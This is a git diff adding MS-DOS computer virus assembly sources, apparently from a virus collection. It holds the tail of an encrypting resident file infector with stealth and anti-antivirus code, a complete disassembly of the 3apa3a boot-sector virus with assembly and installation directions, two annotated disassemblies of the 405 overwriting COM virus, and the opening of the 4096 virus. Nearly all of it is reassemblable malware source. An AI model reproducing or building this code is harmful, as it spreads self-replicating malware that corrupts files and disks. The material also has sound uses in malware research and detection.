(offset crypt2 - offset start) ;virus +enc: ; +xor byte ptr cs:[di],1 ;encrypt the virus +inc di ;code +loop enc ; +;--------------------------------------------------------- +mov cx,offset fin +mov di,offset fin + 50 + (offset crypt - offset start) ;virus +mov dx,1 +enc2: ; + +xor byte ptr [di],0ebh +xor word ptr [di],0294ah +not byte ptr [di] +xor byte ptr [di],071h +not word ptr [di] +xor word ptr [di],07ab0h +xor byte ptr [di],02ah +dec word ptr [di] +sub byte ptr [di],01h +sub word ptr [di],0e273h +add word ptr [di],0ec3h +xor word ptr [di],0e373h +xor byte ptr [di],049h +add word ptr [di],0bb4h +not byte ptr [di] +dec word ptr [di] +inc di +inc di ;the virus code +loop enc2 ; +;-------------------------------------------- +mov ah,40h ; +mov cx,offset fin - offset start ;copy the virus +mov dx,offset fin + 50 ;to end of file +int 21h ; +;---------------------------------------------------------- +cerrar: ; + ;restore the +mov ax,5701h ;date and time +mov cx,word ptr cs:[hora] ;file +mov dx,word ptr cs:[dia] ; +or cx,word ptr cs:[fecha] ;and mark the seconds +int 21h ; +;---------------------------------------------------------- +mov ah,3eh ; +int 21h ;close the file +;---------------------------------------------------------- +pop ds ; +pop es ;restore the +pop bp ;registers +pop di ; +pop si ; +popa ; +popf ; +;---------------------------------------------------------- +pusha ; + ; +mov ax,4301h ;restores the atributes +mov cx,word ptr cs:[attrib] ;of the file +int 21h ; + ; +popa ; +;---------------------------------------------------------- +pushf ; +pusha ; 8-( = f-prot +push si ; +push di ; 8-( = tbav +push bp ; +push es ; 8-) = I'm +push ds ; +;---------------------------------------------------------- +mov ax,2524H ; +lea bx,error ;restore the +mov ds,bx ;errors handler +lea bx,error+2 ; +int 21h ; +;---------------------------------------------------------- +pop ds ; +pop es ; +pop bp ;restore the +pop di ;resgisters +pop si ; +popa ; +popf ; +;---------------------------------------------------------- +JMP A3 ;jmp to orig. INT 21 + ; +;********************************************************** +; SUBRUTINES AREA +;********************************************************** + ; +movedor: ; + ; +xor cx,cx ;use to move file pointer +xor dx,dx ; +int 21h ; +ret ; +;---------------------------------------------------------- +all: ; + ; +XOR AL,AL ;use to set +iret ;error flag + +;*********************************************************** +; DATA AREA +;*********************************************************** +largo dw ? +jump db 0e9h +real db 0cdh,20h,0 +hora dw ? +dia dw ? +attrib dw ? +int21 dd ? +error dd ? + +;------------------------ +action: ;Nothing Action! +NOP ;only replicate +ret ;Return to call +;------------------------ + +;--------------------------------- +ANTI_V: ; +MOV AX,0FA01H ;REMOVE VSAFE FROM MEMORY +MOV DX,5945H ; +INT 21H ; +ret ; +;--------------------------------- + +;***************************************************** +dir_s: + pushf + push cs + call a3 ;Get file Stats + test al,al ;Good FCB? + jnz no_good ;nope + push ax + push bx + push es + mov ah,51h ;Is this Undocmented? huh... + int 21h + mov es,bx + cmp bx,es:[16h] + jnz not_infected + mov bx,dx + mov al,[bx] + push ax + mov ah,2fh ;Get file DTA + int 21h + pop ax + inc al + jnz fcb_okay + add bx,7h +fcb_okay: mov ax,es:[bx+17h] + and ax,1fh ;UnMask Seconds Field + xor al,byte ptr cs:fechad + jnz not_infected + and byte ptr es:[bx+17h],0e0h + sub es:[bx+1dh],OFFSET FIN - OFFSET START ;Yes minus virus size + sbb es:[bx+1fh],ax +not_infected:pop es + pop bx + pop ax +no_good: iret +;******************************************************************** +; THIS DIR STEALTH METOD IS EXTRAC FROM NUKEK INFO JOURNAL 4 & N-POX +;********************************************************************* + +action_dia Db 014H ;day for the action +action_mes Db 02H ;month for the action +FECHA DW 01eH ;Secon for mark +FECHAd Db 01eH ;Secon for mark dir st +fin: +code ends +end start diff --git a/MSDOS/Virus.MSDOS.Unknown.3apa3a.asm b/MSDOS/Virus.MSDOS.Unknown.3apa3a.asm new file mode 100644 index 00000000..b2269b32 --- /dev/null +++ b/MSDOS/Virus.MSDOS.Unknown.3apa3a.asm @@ -0,0 +1,520 @@ +; To assemble, simple run TASM and TLINK on this file and generate a binary. +; The first 512d bytes of the binary will contain the portion of the virus +; which resides in IO.SYS. The second 512d bytes will contain the boot +; section portion of the virus. + +; Installation is slightly more difficult. It requires you to simulate +; an infection with 3apa3a. Read the text above for information. Basically, +; you have to fill in the BPB in the boot sector, fill in the patch values, +; and then move the pieces onto the disk properly. + + .model tiny + .code + .radix 16 + org 0 +; 3apa3a virus +; Disassembly by Dark Angel of Phalcon/Skism for 40Hex Issue 14 +zero: +_3apa3a: push cs + call doffset +doffset: pop si + db 83,0EE,4 ; sub si,4 + push si ax bx cx dx ds es + + mov ah,4 ; get date + int 1Ah + + cmp dh,8 ; september? + jne no_activate + + lea bx,cs:[si+message-_3apa3a] + mov ax,0E42 ; begin with B + mov cx,endmessage - message +display_loop: int 10 ; print character + add al,cs:[bx] ; calculate next character + inc bx + loop display_loop + +no_activate: cld + xor ax,ax ; ds = 0 + mov ds,ax + push cs ; es = cs + pop es + lea di,[si+offset old_i13] + push si + mov si,13*4 ; grab old int 13 handler + movsw + movsw + mov ax,ds:413 ; get BIOS memory size + dec ax ; decrease by 2K + dec ax + mov ds:413,ax ; replace the value + mov cl,6 ; convert to paragraphs + shl ax,cl + mov [si-2],ax ; replace interrupt handler + mov word ptr [si-4],offset i13 + mov es,ax ; move ourselves up + push cs + pop ds si + xor di,di + mov cx,200 + push si + rep movsw ; copy now! + inc ch ; cx = 1 + sub si,200 ; copy rest + rep movsw + pop si + push cs es + mov ax,offset highentry + push ax + retf + +highentry: mov ax,7C0 + mov ds,ax + mov word ptr ds:200,201 + mov byte ptr ds:202,80 + les ax,dword ptr cs:203 + mov dx,es + pop es + mov bx,si + mov cx,1 + mov word ptr cs:3C2,0FCF0 ; patch work_on_sectors to call + call work_on_sectors ; do_i13 + pop es ds dx cx bx ax + retf + +message: db ' ' - 'B' + db 'B' - ' ' + db 'O' - 'B' + db 'O' - 'O' + db 'T' - 'O' + db ' ' - 'T' + db 'C' - ' ' + db 'E' - 'C' + db 'K' - 'E' + db 'T' - 'K' + db 'O' - 'T' + db 'P' - 'O' + db 'E' - 'P' + db ' ' - 'E' + db '-' - ' ' + db ' ' - '-' + db '3' - ' ' + db 'A' - '3' + db 'P' - 'A' + db 'A' - 'P' + db '3' - 'A' + db 'A' - '3' + db '!' - 'A' + db 7 - '!' + db 0Dh - 7 + db 10 - 0Dh +endmessage: + +do_i13: mov ax,ds:200 + mov dl,ds:202 + mov byte ptr cs:patch,0EBh ; jmp absolute + int 13 ; do interrupt + mov byte ptr cs:patch,75 ; jnz + jc retry_error + cld + retn + +retry_error: cmp dl,80 ; first hard drive? + je do_i13 ; if so, retry +go_exit_i13: jmp exit_i13 ; otherwise quit + +i13: push ax bx cx dx si di ds es bp + mov bp,sp + test dl,80 ; hard drive? +patch: jnz go_exit_i13 + + add dh,cl ; check if working on + add dh,ch ; boot sector or + cmp dh,1 ; partition table + ja go_exit_i13 ; if not, quit + + mov ax,cs ; get our current segment + add ax,20 ; move up 200 bytes + mov ds,ax + mov es,ax + mov word ptr ds:200,201 ; set function to read + mov ds:202,dl ; set drive to hard drive + mov bx,400 ; set buffer + xor dx,dx ; read in the boot sector + push dx + mov cx,1 + call do_i13 ; read in boot sector + + cmp byte ptr ds:400+21,2E ; check if 3apa3a already there + je go_exit_i13 + cmp byte ptr ds:400+18,0 + je go_exit_i13 + + push cs + pop es + mov di,203 + mov si,403 + mov cx,1Bh ; copy disk tables + cld + rep movsb + + sub si,200 ; copy the rest + mov cx,1E2 + rep movsb + + inc byte ptr ds:201 ; set to write + mov ax,ds:16 ; get sectors per FAT + mul byte ptr ds:10 ; multiply by # FATs + mov bx,ds:11 ; get number of sectors + mov cl,4 ; occupied by the root + shr bx,cl ; directory + db 83,0FBh,5 ; cmp bx,5 ; at least five? + jbe go_exit_i13 ; if not, quit + + add ax,bx ; + add ax,ds:0E ; add # reserved sectors + dec ax ; drop two sectors to find + dec ax ; start of last sector + xor dx,dx ; of root directory + push ax dx + call abs_sec_to_BIOS + mov ds:patch1-200,cx ; move original boot + mov ds:patch2-200,dh ; sector to the end of the + xor bx,bx ; root directory + call do_i13 + pop dx ax + dec ax + call abs_sec_to_BIOS + + mov ds:34,cx ;patch3 ; write io portion to + mov ds:37,dh ;patch4 + add bh,6 ; bx = 600 + call do_i13 + + push ds + xor ax,ax + mov ds,ax + mov dx,ds:46C ; get timer ticks + pop ds + + mov bl,dl ; eight possible instructions + db 83,0E3,3 ; and bx,3 + push bx + shl bx,1 ; convert to word index + mov si,bx + mov cx,es:[bx+encrypt_table] + pop bx + push bx + mov bh,bl + shr bl,1 ; bl decides which ptr to use + lea ax,cs:[bx+2BBE] ; patch pointer + mov ds:[decrypt-bs_3apa3a],ax ; and start location + add ch,bl + mov ds:[encrypt_instr-bs_3apa3a],cx + add ax,0CF40 + mov ds:[patch_endptr-bs_3apa3a],ax + pop ax + push ax + mul dh + add al,90 ; encode xchg ax,?? + add bl,46 ; encode inc pointer + mov ah,bl + mov ds:[patch_incptr-bs_3apa3a],ax + mov dx,word ptr cs:[si+decrypt_table] + mov word ptr cs:decrypt_instr,dx + pop di + db 83,0C7 ;add di,XX ; start past decryptor + dw bs_3apa3a_decrypt - bs_3apa3a + org $ - 1 + mov si,di + push ds + pop es + mov cx,end_crypt - bs_3apa3a_decrypt; bytes to crypt + mov ah,al +encrypt_loop: lodsb +decrypt_instr: add al,ah + stosb + loop encrypt_loop + + pop dx + mov cx,1 ; write the replacement + xor bx,bx ; boot sector to the disk + call do_i13 +exit_i13: mov sp,bp + pop bp es ds di si dx cx bx ax + db 0EAh +old_i13 dw 0, 0 + +decrypt_table: not al + sub al,ah + add al,ah + xor al,ah + +encrypt_table dw 014F6 ; not + dw 0480 ; add + dw 2C80 ; sub + dw 3480 ; xor +; This marks the end of the IO.SYS only portion of 3apa3a + +; The boot sector portion of 3apa3a follows. + + adj_ofs = 7C00 + zero - bs_3apa3a + +bs_3apa3a: jmp short decrypt + nop + ; The following is an invalid boot sector. Replace it with + ; yours. + db ' ' + + db 00, 00, 00, 00, 00, 00 + db 00, 00, 00, 00, 00, 00 + db 00, 00, 00, 00, 00, 00 + db 00 + +decrypt: db 0BF ; mov di, + dw adj_ofs + bs_3apa3a_decrypt +decrypt_loop: db 2e ; cs: +encrypt_instr label word + db 80,2Dh ; sub byte ptr [di],XX +patch_incptr label word + db 0 ; temporary value for cryptval + inc di + db 81 ; cmp +patch_endptr label word + db 0ff ; pointer + dw adj_ofs + end_crypt + jne decrypt_loop +bs_3apa3a_decrypt = $ - 1 + jmp short enter_bs_3apa3a + nop + +load_original: xor dx,dx ; set up the read + mov es,dx ; of the original boot sector + db 0B9 ; mov cx, XXXX +patch3 dw 3 + db 0B6 +patch4 db 1 + mov bx,ds ; es:bx = 0:7C00 + mov ax,201 + db 0ebh ; jump to code in stack + dw bs_3apa3a - 4 - ($ + 1) + + org $ - 1 + +enter_bs_3apa3a:cli + xor ax,ax + mov ss,ax ; set stack to just below us + mov sp,7C00 + sti + mov dl,80 ; reset hard drive + int 13 + + mov ax,2F72 ; encode JNZ load_original at + ; 7BFE + mov ds,sp ; set segment registers to + mov es,sp ; 7C00 + push ax + mov word ptr ds:200,201 ; do a read + mov ds:202,dl ; from the hard drive + xor bx,bx ; read to 7C00:0 + mov dh,1 ; read head 1 + mov cx,1 ; read sector 1 + ; (assumes active boot + ; sector is here) + mov ax,13CDh ; encode int 13 at 7BFC + push ax + call exec_int13 ; do the read + mov bx,203 + cmp byte ptr [bx-4],0AA ; is it valid bs? +jnz_load_original: + jne load_original ; if not, assume infected and + ; transfer control to it + mov ax,ds:13 ; get number of sectors in + dec ax ; image - 1 + cmp ax,5103 ; hard drive too small? (5103h + jbe load_original ; sectors ~ 10.6 megs) + mov ax,ds:1C ; get number hidden sectors + add ax,ds:0E ; add number reserved sectors + mov ds:9,ax ; store at location that holds + ; the end of OEM signature + add ax,ds:16 ; add sectors per FAT + dec ax ; go down two sectors + dec ax + push ax + xor dx,dx + mov cx,dx + call work_on_sectors ; load end of FAT to 7C00:203 + mov ax,ds:16 ; get sectors per FAT + push ax ; save the value + mul byte ptr ds:10 ; multiply by # FATs + add ax,ds:9 ; calculate start of root dir + mov ds:7,ax ; store it in work buffer + mov cl,4 + mov si,ds:11 ; get number sectors the + shr si,cl ; root directory takes + add si,ax ; and calculate start of data + mov ds:5,si ; area and store it in buffer + call work_on_sectors ; get first 5 sectors of the + ; root directory + test byte ptr ds:403+0Bh,8 ; volume label bit set on first + ; entry? (infection marker) +jne_load_original: ; if so, already infected, so + jnz jnz_load_original ; quit + xor si,si + mov bx,1003 + mov ax,ds:403+1A ; get starting cluster number + ; of IO.SYS +read_IO_SYS: push ax ; convert cluster to absolute + call clus_to_abs_sec ; sector number + call work_on_sector ; read in one cluster of IO.SYS + inc si + pop ax + + push bx ax + mov bx,403+0A00 ; read into this buffer + push bx + mov al,ah ; find the sector with the FAT + xor dx,dx ; entry corresponding to this + mov ah,dl ; cluster + add ax,ds:9 + call work_on_sectors ; read in the FAT + pop bx ax + mov ah,dl + shl ax,1 + mov di,ax + mov ax,[bx+di] ; grab the FAT entry (either EOF + ; or next cluster number) + pop bx ; corresponding to this cluster + cmp ax,0FFF0 ; is there any more to read? + jb read_IO_SYS ; if so, keep going + + inc byte ptr ds:201 ; change function to a write + pop cx + dec cx + dec cx + mov ds:4,cl + mov di,401 ; scan the end of the FAT + mov cx,100 + mov bp,-1 +copy_IO_SYS: xor ax,ax ; look for unused clusters + repne scasw + jnz jne_load_original + mov [di+2],bp + mov bx,cx + mov bh,ds:4 + mov bp,bx ; save starting cluster of + push bp cx ; where IO.SYS will be moved + mov ah,ds:0Dh + shl ax,1 + dec si + mul si + mov bx,ax + add bx,1003 + mov ax,bp + call clus_to_abs_sec + call work_on_sector ; move IO.SYS to end of HD + pop cx bp + or si,si + jnz copy_IO_SYS + + mov si,0DE1 ; move all but the first two + mov di,0E01 ; directory entries down one + mov cx,4D0 ; (10 dir entries / sector, + rep movsw ; 5 sectors) + ; DF set by exec_int13 + mov si,421 ; move IO.SYS entry down two + mov cx,10 ; entries + rep movsw + + mov ds:400+2*20+1Dh,bp ; set starting cluster of the + ; moved original IO.SYS + or byte ptr ds:40E,8 ; set volume label bit on first + ; IO.SYS entry + mov bx,403 ; point to root directory + mov ax,ds:7 ; get starting cluster of + xor dx,dx ; root dir + mov cl,4 + call work_on_sectors ; write updated root directory + pop ax ; to the disk +write_FATs: mov bx,203 ; point to the updated FAT + call work_on_sectors ; write changed end of FAT + + dec ax + add ax,ds:16 ; add sectors per FAT + dec byte ptr ds:10 ; processed all the FATs? + jnz write_FATs + + mov ax,bp + call clus_to_abs_sec + mov cs:7C03,ax ; store the values + mov cs:7C05,dx + mov byte ptr cs:7C01,1Ch + + xor ax,ax ; reset default drive + mov dx,ax + int 13 + + mov ax,201 ; read in original boot sector +; You must patch the following values if you are installing 3apa3a on a disk + db 0b9 ; mov cx, XXXX +patch1 dw 0 + db 0b6 ; mov dh, XX +patch2 db 0 + mov bx,0E03 + call perform_int13 + + mov ax,ds:403+1A ; get starting cluster number + call clus_to_abs_sec ; of IO.SYS + xor cx,cx + call work_on_sectors + mov bx,ds + mov es,cx + call work_on_sectors +go_load_original: + jmp load_original + +exec_int13: mov ax,ds:200 ; get function from memory + mov dl,ds:202 ; get drive from memory +perform_int13: int 13 + jc go_load_original + std + retn + +work_on_sectors:inc cx +work_on_sector: push cx dx ax + call abs_sec_to_BIOS + call exec_int13 + pop ax dx cx + add ax,1 ; calculate next sector + db 83,0D2,0 ; adc dx,0 ; (don't use INC because + add bh,2 ; INC doesn't set carry) + loop work_on_sector ; do it for the next sector + + retn + +abs_sec_to_BIOS:div word ptr ds:18 ; divide by sectors per track + mov cx,dx + inc cl + xor dx,dx + div word ptr ds:1A ; divide by number of heads + ror ah,1 + ror ah,1 + xchg ah,al + add cx,ax + mov dh,dl + retn + +clus_to_abs_sec:mov cl,ds:0Dh ; get sectors per cluster + xor ch,ch ; (convert to word) + dec ax + dec ax + mul cx ; convert cluster number to + add ax,ds:5 ; absolute sector number +end_crypt: db 83,0D2,0 ; adc dx,0 + retn + + dw 0AA55 ; boot signature + + end _3apa3a + diff --git a/MSDOS/Virus.MSDOS.Unknown.405.asm b/MSDOS/Virus.MSDOS.Unknown.405.asm new file mode 100644 index 00000000..34c7347d --- /dev/null +++ b/MSDOS/Virus.MSDOS.Unknown.405.asm @@ -0,0 +1,177 @@ +;405 virus +;disassembled 10th March 1991 by Fred Deakin. +; + +start: + xchg si,ax ;96 }marker bytes ? + add [bx+si],al ;00 00 } + sahf ;9e } + add [bx+si],al ;00 00 } + nop ;90 } + mov ax,0000h ;clear ax + mov byte es:[drive],al ;default drive? + mov byte es:[dir_path],al ;clear first byte in directory path + mov byte es:[l_drvs],al ;clear logical drives + push ax ;save ax + mov ah,19h ;get current drive + int 21h ;call msdos + mov byte es:[drive],al ;and save + mov ah,47h ;get directory path + add al,01h ;add 1 to drive code + push ax ;and save + mov dl,al ;move drive code to dl + lea si,[dir_path] ;si=offset address of directory buffer + int 21h ;call msdos + pop ax ;get back drive code + mov ah,0eh ;set default drive + sub al,01h ;subtract and get logical drive + mov dl,al ;drive wanted + int 21h ;call msdos + mov byte es:[l_drvs],al ;store how many logical drives +l0139: + mov al,byte es:[drive] ;get default drive + cmp al,00h ;drive a:? + jnz l0152 ;if not jump forward + mov ah,0eh ;set default drive + mov dl,02h ;drive c: + int 21h ;call msdos + mov ah,19h ;get current drive + int 21h ;call msdos + mov byte es:[c_drv],al ;and save + jmp l0179 ;jump forward + nop ;no operation +l0152: + cmp al,01h ;drive b:? + jnz l0167 ;jump forward if not + mov ah,0eh ;set default drive + mov dl,02h ;to drive c: + int 21h ;call msdos + mov ah,19h ;get current drive + int 21h ;call msdos + mov byte es:[c_drv],al ;and save + jmp l0179 ;jump forward + nop ;no operation +l0167: + cmp al,02h ;drive c:? + jnz l0179 ;if not jump forward + mov ah,0eh ;set default drive + mov dl,00h ;drive a: + int 21h ;call msdos + mov ah,19h ;get current drive + int 21h ;call msdos + mov byte es:[c_drv],al ;and save +l0179: + mov ah,4eh ;search for first + mov cx,0001h ;file attributes + lea dx,[f_name] ;point to file name + int 21h ;call msdos + jb l0189 ;no .COM files + jmp l01a9 ;found one + nop ;no operation +l0189: + mov ah,3bh ;set directory + lea dx,[l0297] ;point to path + int 21h ;call msdos + mov ah,4eh ;search for first + mov cx,0011h ;set attributes + lea dx,[l0292] ; + int 21h ;call msdos + jb l0139 ;no .COM files + jmp l0179 ;jump back +l01a0: + mov ah,4fh ;search for next + int 21h ;call msdos + jb l0189 ;no .COM files found + jmp l01a9 ;found one + nop ;no operation +l01a9: + mov ah,3dh ;open file + mov al,02h ;for read/write access + mov dx,009eh ;offset address of path name + int 21h ;call msdos + mov bx,ax ;save file handle + mov ah,3fh ;read file + mov cx,0195h ;would you believe 405 bytes to read + nop ;no operation + mov dx,0e000h ;offset address of buffer + nop ;no operation + int 21h ;call msdos + mov ah,3eh ;close file + int 21h ;call msdos + mov bx,es:[0e000h] ;get first byte of loaded buffer + cmp bx,9600h ;405 virus already installed? + jz l01a0 ;yes jump back and search for next + mov ah,43h ;get/set file attributes + mov al,00h ;get file attributes + mov dx,009eh ;offset address of path name + int 21h ;call msdos + mov ah,43h ;get/set file attributes + mov al,01h ;set file attributes + and cx,00feh ;no files read only + int 21h ;call msdos + mov ah,3dh ;open file + mov al,02h ;for read/write access + mov dx,009eh ;offset address of path name + int 21h ;call msdos + mov bx,ax ;save file handle in bx + mov ah,57h ;get/set date and time + mov al,00h ;get file date and time + int 21h ;call msdos + push cx ;file time + push dx ;file date + mov dx,cs:[0295h] ;get variable byte? + mov cs:[0e195h],dx ;place at end of file loaded + mov dx,cs:[0e001h] ;get second byte in buffer + lea cx,ds:[0194h] ; + sub dx,cx ; + mov cs:[0295h],dx ;place at end of file + mov ah,40h ;write file + mov cx,0195h ;amount of bytes to write + nop ;no operation + lea dx,[start] ;get starting location + int 21h ;call msdos + mov ah,57h ;get/set file date and time + mov al,01h ;set file date and time + pop dx ;file date + pop cx ;file time + int 21h ;call msdos + mov ah,3eh ;close file + int 21h ;call msdos + mov dx,cs:[0e195h] ;get variable + mov cs:[0295h],dx ;place at end of file + jmp l0234 ;jump forward + nop ;no operation +l0234: + mov ah,0eh ;set default drive + mov dl,byte cs:[drive] ;get back original default drive + int 21h ;call msdos + mov ah,3bh ;set directory + lea dx,[c_drv] ;8d 16 4a 02 + int 21h ;call msdos + mov ah,00h ;return to dos + int 21h ;call msdos +drive: + db 02 ;drive variable +c_drv: + db 00 ;current drive +dir_path: + db "TEST" + db 00,00,00,00,00,00,00,00,00,00 + db 00,00,00,00,00,00,00,00,00,00 + db 00,00,00,00,00,00,00,00,00,00 + db 00,00,00,00,00,00,00,00,00,00 + db 00,00,00,00,00,00,00,00,00,00 + db 00,00,00,00,00,00,00,00,00,00 +l_drvs: + db 00 ;how many logical drives on system +f_name: + db "*.COM" + db 0h +l0292: + db 2ah,00h +l0293: + db 0e9h,00h +l0295: + db 00h +l0297: + \ No newline at end of file diff --git a/MSDOS/Virus.MSDOS.Unknown.405_.asm b/MSDOS/Virus.MSDOS.Unknown.405_.asm new file mode 100644 index 00000000..21ddfbbb --- /dev/null +++ b/MSDOS/Virus.MSDOS.Unknown.405_.asm @@ -0,0 +1,206 @@ + title The '405' virus + page 65,132 +; ͻ +; British Computer Virus Research Centre +; 12 Guildford Street, Brighton, East Sussex, BN1 3LS, England +; Telephone: Domestic 0273-26105, International +44-273-26105 +; +; The '405' Virus +; Disassembled by Joe Hirst, March 1989 +; +; Copyright (c) Joe Hirst 1989. +; +; This listing is only to be made available to virus researchers +; or software writers on a need-to-know basis. +; ͼ + + ; The virus overwrites the first 405 bytes of a COM file. If the + ; length of the COM file is less than this, the length is increased + ; to 405 bytes. + + ; The disassembly has been tested by re-assembly using MASM 5.0. + +BUFFER SEGMENT AT 0 + + ORG 295H +DW0295 DW ? +DB0297 DB ? + + ORG 0E000H +DWE000 DW ? ; Read buffer area + + ORG 0E195H +DWE195 DW ? ; Program after virus + +BUFFER ENDS + +CODE SEGMENT BYTE PUBLIC 'CODE' + ASSUME CS:CODE,DS:NOTHING,ES:BUFFER + +VIRLEN EQU OFFSET ENDADR-START + ORG 100H + +START: XCHG SI,AX + ADD [BX+SI],AL + SAHF + ADD [BX+SI],AL + NOP + + MOV AX,0 ; Clear register + MOV ES:DB0249,AL ; Set current disk to default + MOV ES:DB024B,AL ; Set pathname store to zero + MOV ES:DB028B,AL ; Set number of drives to zero + PUSH AX + MOV AH,19H ; Get current disk function + INT 21H ; DOS service + MOV ES:DB0249,AL ; Save current disk + MOV AH,47H ; Get current directory function + ADD AL,1 ; Next drive (A) + PUSH AX + MOV DL,AL ; Drive A + LEA SI,DB024B ; Pathname store + INT 21H ; DOS service + POP AX + MOV AH,0EH ; Select disk function + SUB AL,1 ; Convert drive for select function + MOV DL,AL ; Move drive + INT 21H ; DOS service + MOV ES:DB028B,AL ; Save number of drives +BP0139: MOV AL,ES:DB0249 ; Get current disk + CMP AL,0 ; Is drive A? + JNZ BP0152 ; Branch if not + MOV AH,0EH ; Select disk function + MOV DL,2 ; Change drive to B + INT 21H ; DOS service + MOV AH,19H ; Get current disk function + INT 21H ; DOS service + MOV ES:DB024A,AL ; Save new current drive + JMP BP0179 + +BP0152: CMP AL,1 ; Is drive B? + JNZ BP0167 ; Branch if not + MOV AH,0EH ; Select disk function + MOV DL,2 ; Change drive to C + INT 21H ; DOS service + MOV AH,19H ; Get current disk function + INT 21H ; DOS service + MOV ES:DB024A,AL ; Save new current drive + JMP BP0179 + +BP0167: CMP AL,2 ; Is drive C? + JNZ BP0179 ; Branch if not + MOV AH,0EH ; Select disk function + MOV DL,0 ; Change drive to A + INT 21H ; DOS service + MOV AH,19H ; Get current disk function + INT 21H ; DOS service + MOV ES:DB024A,AL ; Save new current drive +BP0179: MOV AH,4EH ; Find first file function + MOV CX,1 ; Find read-only files, not system + LEA DX,DB028C ; Path '*.COM' + INT 21H ; DOS service + JB BP0189 ; Branch if error + JMP BP01A9 ; Process COM file + +BP0189: MOV AH,3BH ; Change current directory function + LEA DX,DB0297 ; Directory pathname (this is past the end) + INT 21H ; DOS service + MOV AH,4EH ; Find first file function + MOV CX,0011H ; Find directory and read-only + LEA DX,DB0292 ; Path '*' + INT 21H ; DOS service + JB BP0139 ; Branch if error + JMP BP0179 ; Find a COM file + +BP01A0: MOV AH,4FH ; Find next file function + INT 21H ; DOS service + JB BP0189 ; Branch if error + JMP BP01A9 ; Process COM file + + ; Process COM file + +BP01A9: MOV AH,3DH ; Open handle function + MOV AL,2 ; R/W access + MOV DX,009EH ; File pathname + INT 21H ; DOS service + MOV BX,AX ; Move handle + MOV AH,3FH ; Read handle function + MOV CX,VIRLEN ; Length of virus + NOP + MOV DX,OFFSET DWE000 ; Read it in way down there + NOP + INT 21H ; DOS service + MOV AH,3EH ; Close handle function + INT 21H ; DOS service + MOV BX,DWE000 ; Get first word of COM file + CMP BX,9600H ; Is it infected? (should be 0096H) + JZ BP01A0 ; Yes, find another one + MOV AH,43H ; \ Get file attributes function + MOV AL,0 ; / + MOV DX,009EH ; File pathname + INT 21H ; DOS service + MOV AH,43H ; \ Set file attributes function + MOV AL,1 ; / + AND CX,00FEH ; Set off read only attribute + INT 21H ; DOS service + MOV AH,3DH ; Open handle function + MOV AL,2 ; R/W mode + MOV DX,009EH ; File pathname + INT 21H ; DOS service + MOV BX,AX ; Move handle + MOV AH,57H ; \ Get file date & time function + MOV AL,0 ; / + INT 21H ; DOS service + PUSH CX + PUSH DX + ASSUME ES:NOTHING + MOV DX,CS:DW0295 ; Get word after virus here + MOV CS:DWE195,DX ; Move to same position in prog + MOV DX,CS:DWE000+1 ; Get displacement from initial jump + LEA CX,DB0294-100H ; Length of virus minus one + SUB DX,CX + MOV CS:DW0295,DX ; Store in word after virus + MOV AH,40H ; Write handle function + MOV CX,VIRLEN ; Length of virus + NOP + LEA DX,START ; Beginning of virus + INT 21H ; DOS service + MOV AH,57H ; \ Set file date & time function + MOV AL,1 ; / + POP DX + POP CX + INT 21H ; DOS service + MOV AH,3EH ; Close handle function + INT 21H ; DOS service + MOV DX,CS:DWE195 ; Get word after virus + MOV CS:DW0295,DX ; Move to same position here + JMP BP0234 + +BP0234: MOV AH,0EH ; Select disk function + MOV DL,CS:DB0249 ; Get current disk + INT 21H ; DOS service + MOV AH,3BH ; Change current directory function + LEA DX,DB024A ; Address of path - this is incorrect + INT 21H ; DOS service + MOV AH,0 ; Terminate program function + INT 21H ; DOS service + +DB0249 DB 2 ; Current disk +DB024A DB 0 ; New current drive + + ; There should be an extra byte at this point containing '\' + ; for use by the change directory function - this is why that + ; function is pointing at the previous field + +DB024B DB 'TEST', 3CH DUP (0) +DB028B DB 0DH ; Number of drives +DB028C DB '*.COM', 0 +DB0292 DB '*', 0 +DB0294 DB 0E9H + +ENDADR EQU $ + +CODE ENDS + + END START + \ No newline at end of file diff --git a/MSDOS/Virus.MSDOS.Unknown.4096.asm b/MSDOS/Virus.MSDOS.Unknown.4096.asm new file mode 100644 index 00000000..da57d58f --- /dev/null +++ b/MSDOS/Virus.MSDOS.Unknown.4096.asm @@ -0,0 +1,1902 @@ + +PAGE 59,132 + +; +; +; VIR_ +; +; Created: ??-??-?? +; Version: +; Code type: zero start +; Passes: 9 Analysis Options on: A +; +; Disassembled by: Sir John -- 11.MAR.1991 +; +; + +PSP_0A equ 0Ah ; (0000:000A=0) +MCB_0000 equ 0 ; (7DBC:0000=E9) +MCB_0001 equ 1 ; (7DBC:0001=275h) +MCB_0003 equ 3 ; (7DBC:0003=1503h) +all_len equ 1600h +jmp_len equ 3 +sav_file equ data_23 - virus_entry + jmp_len + +seg_a segment byte public + assume cs:seg_a, ds:seg_a + + org 0 + + db 00h + + jmp vir_1 +data_23 dw 20CDh ; old file +data_24 dw 0 ; (first 6 bytes) +data_25 dw 0 ; - check sum + db 0,0,0,0,0,0,0,0 +data_27 dw 0 ; + 0eh = original SS: +data_28 dw 0 ; + 10h = original SP + dw 0 +data_29 dd 0 ; + 14h = .EXE file entry point + db 0,0,0,0 +data_31 db 0 ; flag : 1-EXE, 0-COM +data_32 db 0FEh + db 3Ah +debug: push bp ;address is 0023 + mov bp,sp + push ax + cmp [bp+4],0C000h + jae loc_1_1 ; segment > C000 + mov ax,cs:data_68 + cmp [bp+4],ax + jna loc_1_1 +loc_1: pop ax + pop bp + iret ; Interrupt return +loc_1_1: cmp byte ptr cs:data_73,1 ; (CS:1250=0) + je loc_3 ; Jump if equal + mov ax,[bp+4] + mov word ptr cs:old_INT+2,ax ; (CS:122F=70h) + mov ax,[bp+2] + mov word ptr cs:old_INT,ax ; (CS:122D=0) + jc loc_2 ; Jump if carry Set + pop ax + pop bp + mov ss,cs:data_92 ; (CS:12DD=151Ch) + mov sp,cs:data_93 ; (CS:12DF=0) + mov al,cs:data_97 ; (CS:12E5=0) + out 21h,al ; port 21h, 8259-1 int comands + jmp loc_79 ; (0D40) +loc_2: + and word ptr [bp+6],0FEFFh + mov al,cs:data_97 ; (CS:12E5=0) + out 21h,al ; port 21h, 8259-1 int comands + jmp short loc_1 ; (0037) +loc_3: + dec cs:data_74 ; (CS:1251=0) + jnz loc_1 ; Jump if not zero + and word ptr [bp+6],0FEFFh + call sub_21 ; Save REGS in vir's stack + call sub_18 ; (0DBA) + lds dx,cs:old_INT_1 ; (CS:1231=0) Load 32 bit ptr + mov al,1 + call sub_27 ; Set INT 01 vector + call sub_20 ; Restore regs from vir's stack + jmp short loc_2 ; (0067) + + +; +; SUBROUTINE +; + +sub_1 proc near + push ds + push si + xor si,si ; Zero register + mov ds,si + xor ah,ah ; Zero register 